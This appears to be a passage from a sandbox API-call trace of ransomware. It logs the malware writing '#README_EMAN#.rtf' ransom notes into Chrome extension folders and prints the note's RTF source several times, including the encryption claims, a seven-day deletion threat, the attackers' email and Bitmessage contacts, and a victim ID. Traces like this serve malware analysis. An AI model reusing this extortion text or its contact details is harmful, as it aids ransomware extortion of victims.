R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.602] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.603] CloseHandle (hObject=0x294) returned 1 [0297.603] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0297.604] GetLastError () returned 0x2 [0297.604] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.606] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.606] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.606] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED 